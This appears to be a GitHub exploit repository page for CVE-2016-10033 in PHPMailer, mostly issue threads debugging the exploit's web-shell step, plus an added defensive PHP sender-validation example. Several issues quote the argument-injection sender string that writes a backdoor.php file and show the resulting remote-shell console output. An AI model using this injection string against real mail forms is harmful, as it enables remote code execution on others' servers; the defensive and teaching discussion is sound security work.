
exploit-cve-2016-10033's Introduction

exploit-cve-2016-10033's Issues

Not working, the $mail->setFrom($email,$name) first verifies the email, then sets the $this->Sender

I was looking at your exploit code and it looks like it won't work, as you are passing "vulnerables@ -OQueueDirectory=/tmp -X/backdoor.php" to the setFrom() function, and the setFrom() function first verifies the passed email by some regex, and your malformed email address will not pass the verification

    public function setFrom($address, $name = '', $auto = true)
    {
        $address = trim($address);
        $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
        // Don't validate now addresses with IDN. Will be done in send().
        if (($pos = strrpos($address, '@')) === false or
            (!$this->has8bitChars(substr($address, ++$pos)) or !$this->idnSupported()) and
            !$this->validateAddress($address)) {
            $error_message = $this->lang('invalid_address') . " (setFrom) $address";
            $this->setError($error_message);
            $this->edebug($error_message);

There is a $this->validateAddress call, and if it fails, the function's execution is stopped and the following code is not executed
    $this->From = $address;
    $this->FromName = $name;
    if ($auto) {
        if (empty($this->Sender)) {
            $this->Sender = $address;
        }
    }
Since $this->Sender is not set up with Sender's address then, the exploit will fail as it will use the default initialized value for $this->Sender.

All of the above code is from class.phpmailer.php

Mind Error

Hello, I use 32-bit Kali Linux in a VM on Windows ME.
Your script is not running as it should.

Kisses, hugs, see you!
🗡️

Help getting this to run on "Frankenstein" VM?

Hi there,

I'm working on a "Pentesting 101" talk and am trying to bolt together an Ubuntu Linux VM that will host a variety of popular vulnerabilities, and I'd love to get the PHPMailer exploit up and running (and certainly give you credit and point people towards your work). The Docker version works like a champ but I wanted to make my own native mail form so I could show people how to use your exploit to get a shell and then follow the path to exploring the VM file system, escalating privs, etc.

What I've done:

  • Installed sendmail
  • Plopped your index.php in /var/www/html
  • Copied the src directory to /var/www/html/phpmailer
  • Opened index.php and changed the PHPMailerAutoload.php path to be require 'phpmailer/PHPMailerAutoload.php';
  • Edited the path in exploit.sh to be /var/www/html/backdoor.php instead of /www/backdoor.php

When the exploit runs, I can watch syslog and see the email going through from the POST request. Exploit.sh output says the shell is established and backdoor.php created, but neither of those things is actually happening.

Can you think of anything else I can do to troubleshoot this and get it functional?

Thanks,
Brian

Not sure how it works.

./exploit.sh xxxxx:80
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting xxxxx:80
[+] Target exploited, acessing shell at http://xxxxx:80/backdoor.php
[+] Running whoami
base64: invalid option -- d
Usage: base64 [-dhvD] [-b num] [-i in_file] [-o out_file]
-h, --help display this message
-D, --decode decodes input
-b, --break break encoded string into num character lines
-i, --input input file (default: "-" for stdin)
-o, --output output file (default: "-" for stdout)

RemoteShell>

Whatever thing I input after this (like ls, cd, whoami), I always get this kind of error message

base64: invalid option -- d
Usage: base64 [-dhvD] [-b num] [-i in_file] [-o out_file]
-h, --help display this message
-D, --decode decodes input
-b, --break break encoded string into num character lines
-i, --input input file (default: "-" for stdin)
-o, --output output file (default: "-" for stdout)

What is going on? Are there other commands?

Remote shell not responding

When I run the exploit on my vulnerable VM, the remote shell doesn't reply. Here's an example:

root@PenTest-Kali:/opt/spl0its# ./phpmail 192.168.80.146:8080
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting 192.168.80.146:8080
[+] Target exploited, acessing shell at http://192.168.80.146:8080/backdoor.php
[+] Running whoami

RemoteShell> id
[+] Running id

RemoteShell> w
[+] Running w

Why can't we use additional_parameters in safe_mode?

When I look at the if/else condition:

    if (ini_get('safe_mode') or !$this->UseSendmailOptions or is_null($params)) {
        $result = @mail($to, $subject, $body, $header);
    } else {
        $result = @mail($to, $subject, $body, $header, $params);
    }

In this case, I think if safe_mode is ON but $this->UseSendmailOptions is TRUE, the second condition "$result = @mail($to, $subject, $body, $header, $params);" will still be processed.
At line 176 in class.phpmailer.php: "public $UseSendmailOptions = true;"
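
The sender value discussed in the first issue is what PHPMailer appends to `-f` to build the `$params` argument quoted in the last one. The following is an added example, not code from PHPMailer or from the exploit repository; it mirrors the quoted branch condition and shows an allow-list gate applied to the sender before it reaches `mail()`. All function names are hypothetical and the sample inputs are constructed, except the second, which is the string quoted in the first issue.

```php
<?php
// Added example, not PHPMailer code. Function names below are hypothetical.

// Mirrors the condition quoted in the issue above: the five-argument mail()
// call is reached only when all three operands of the `or` chain are false.
function uses_additional_params(bool $safeMode, bool $useSendmailOptions, ?string $params): bool
{
    return !($safeMode or !$useSendmailOptions or is_null($params));
}

// True only if $sender can follow "-f" without adding sendmail arguments.
function envelope_sender_is_safe(string $sender): bool
{
    if (filter_var($sender, FILTER_VALIDATE_EMAIL) === false) {
        return false; // not a plain address at all
    }
    // Allow-list of characters that never need shell quoting; whitespace,
    // quotes, backslashes and a leading dash are refused outright.
    return preg_match('/\A[A-Za-z0-9][A-Za-z0-9_.+-]*@[A-Za-z0-9.-]+\z/', $sender) === 1;
}

// Builds the value passed as $params, or null to force the four-argument call.
function build_mail_params(?string $sender): ?string
{
    if ($sender === null || $sender === '' || !envelope_sender_is_safe($sender)) {
        return null;
    }
    return '-f' . $sender;
}

// Sample inputs: the first and third are constructed, the second is the
// string quoted in the first issue on this page.
$samples = [
    'noreply@example.com',
    'vulnerables@ -OQueueDirectory=/tmp -X/backdoor.php',
    '-x@example.com',
];
foreach ($samples as $s) {
    $params = build_mail_params($s);
    $five   = uses_additional_params(false, true, $params);
    printf("%-55s params=%-25s five-arg mail(): %s\n",
        var_export($s, true), var_export($params, true), $five ? 'yes' : 'no');
}
// With safe_mode on, the `or` chain short-circuits to the four-argument call.
var_dump(uses_additional_params(true, true, '-fnoreply@example.com'));
```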
